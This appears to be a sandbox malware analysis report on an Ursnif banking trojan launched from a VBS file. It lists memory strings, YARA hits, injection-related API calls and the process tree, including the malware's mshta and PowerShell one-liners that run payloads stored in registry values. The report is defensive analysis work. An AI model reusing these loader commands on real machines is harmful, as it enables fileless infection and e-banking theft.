Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Source: C:\Windows\explorer.exe	Code function: 32_2_04DACCA0 NtReadVirtualMemory,	32_2_04DACCA0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	32_2_04DBF560
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBAD14 NtQuerySystemInformation,	32_2_04DBAD14
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBFFCC NtMapViewOfSection,	32_2_04DBFFCC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC676C NtSetContextThread,NtUnmapViewOfSection,NtClose,	32_2_04DC676C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB387C NtCreateSection,	32_2_04DB387C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB3830 NtWriteVirtualMemory,	32_2_04DB3830
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB1AC4 NtQueryInformationProcess,	32_2_04DB1AC4
Source: C:\Windows\explorer.exe	Code function: 32_2_04DABAB4 NtAllocateVirtualMemory,	32_2_04DABAB4

Source: C:\Windows\explorer.exe	Code function: 32_2_04DA37B8	32_2_04DA37B8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCAFB8	32_2_04DCAFB8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAB75C	32_2_04DAB75C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBF770	32_2_04DBF770
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC676C	32_2_04DC676C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC0034	32_2_04DC0034
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB9138	32_2_04DB9138
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAC134	32_2_04DAC134
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC74CC	32_2_04DC74CC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB0CC0	32_2_04DB0CC0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DABCF8	32_2_04DABCF8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB3CE0	32_2_04DB3CE0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCA4BC	32_2_04DCA4BC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC94B8	32_2_04DC94B8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB9CB0	32_2_04DB9CB0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBD4A8	32_2_04DBD4A8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA5474	32_2_04DA5474
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAD460	32_2_04DAD460
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB1D94	32_2_04DB1D94
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCB516	32_2_04DCB516
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA6D08	32_2_04DA6D08
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB452C	32_2_04DB452C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBB520	32_2_04DBB520
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC26B4	32_2_04DC26B4
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCBEB0	32_2_04DCBEB0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAAE04	32_2_04DAAE04
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA9F98	32_2_04DA9F98
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB17B8	32_2_04DB17B8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC20F8	32_2_04DC20F8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCE080	32_2_04DCE080
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBB040	32_2_04DBB040
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC6064	32_2_04DC6064
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA203C	32_2_04DA203C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC91A0	32_2_04DC91A0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCF940	32_2_04DCF940
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB1174	32_2_04DB1174
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC3208	32_2_04DC3208
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC8224	32_2_04DC8224
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA2BC8	32_2_04DA2BC8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB9380	32_2_04DB9380
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA8B5C	32_2_04DA8B5C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB8B4C	32_2_04DB8B4C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA7320	32_2_04DA7320

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\earmark.avchd 66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF

Source: 0xyZ4rY0opA2.vbs

Initial sample: Strings found which are bigger than 50

Source: iaweong2.dll.28.dr	Static PE information: No import functions for PE file found
Source: xuilsqrn.dll.26.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winVBS@32/52@10/2

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{174A4BA0-2E8C-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{FE2B0A36-4563-E07B-BF12-491463668D88}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0xyZ4rY0opA2.vbs'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: 0xyZ4rY0opA2.vbs

Virustotal: Detection: 22%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0xyZ4rY0opA2.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6976 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP'
